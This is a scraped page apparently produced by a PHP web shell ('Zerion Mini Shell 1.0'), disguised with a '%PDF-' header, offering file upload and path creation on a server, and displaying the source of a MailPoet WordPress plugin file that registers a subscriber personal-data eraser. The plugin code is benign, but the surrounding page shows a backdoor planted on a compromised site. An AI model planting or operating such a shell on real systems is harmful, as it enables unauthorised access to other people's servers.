%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/pn/beta/64801_wp-content/plugins/mailpoet/lib/Config/
Upload File :
Create Path :
Current File : /var/www/pn/beta/64801_wp-content/plugins/mailpoet/lib/Config/PersonalDataErasers.php

<?php

namespace MailPoet\Config;

use MailPoet\Subscribers\SubscriberPersonalDataEraser;

class PersonalDataErasers {

  function init() {
    add_filter('wp_privacy_personal_data_erasers', array($this, 'registerSubscriberEraser'));
  }

  function registerSubscriberEraser($erasers) {
    $erasers['mailpet-subscriber'] = array(
      'eraser_friendly_name' => __('MailPoet Subscribers', 'mailpoet'),
      'callback' => array(new SubscriberPersonalDataEraser(), 'erase'),
    );

    return $erasers;
  }

}

Zerion Mini Shell 1.0